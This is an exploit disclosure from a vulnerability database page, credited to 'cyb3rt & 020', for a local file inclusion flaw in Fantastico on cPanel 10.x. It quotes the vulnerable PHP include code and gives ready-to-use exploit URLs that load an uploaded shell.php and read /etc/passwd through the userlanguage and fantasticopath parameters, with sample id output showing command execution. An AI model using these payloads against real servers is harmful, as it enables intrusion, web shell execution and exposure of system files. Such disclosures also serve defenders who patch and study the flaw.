Fantastico In all Version Cpanel 10.x <= local File Include

2007.03.19
Credit: cyb3rt & 020
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

############################################################## Fantastico In all Version Cpanel 10.x <= local File Include ##############################################################to the Note : Preparations php.ini in Cpanel hypothetical and They also in all WebServer Must provide username And pass and login :2082 To break the strongest protection mod_security & safe_mode:On & Disable functions : All NONE Vulnerable Code ( 1 ) : if(is_file($userlanguage)) { include ( $userlanguage ); In http://xx.com:2082/frontend/x/fantastico/includes/load_language.php Exploit 1 : http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?user language=/home/user/shell.php id uid=32170(user) gid=32170(user) groups=32170(user) Exploit 2 : http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?user language=/etc/passwd ################################################### Vulnerable Code ( 2 ) : $localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php"; if (is_file($localmysqlconfig)) { include($localmysqlconfig); in http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php And also many of the files of the program Exploit : First Create directory Let the name (/includes/) and upload Shell.php in (/includes/) Then rename mysqlconfig.local.php D: :::xploit:::: http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantas ticopath=/home/user/ ################################################### Discoverd By : cyb3rt & 020 ################################################### Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team ###################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top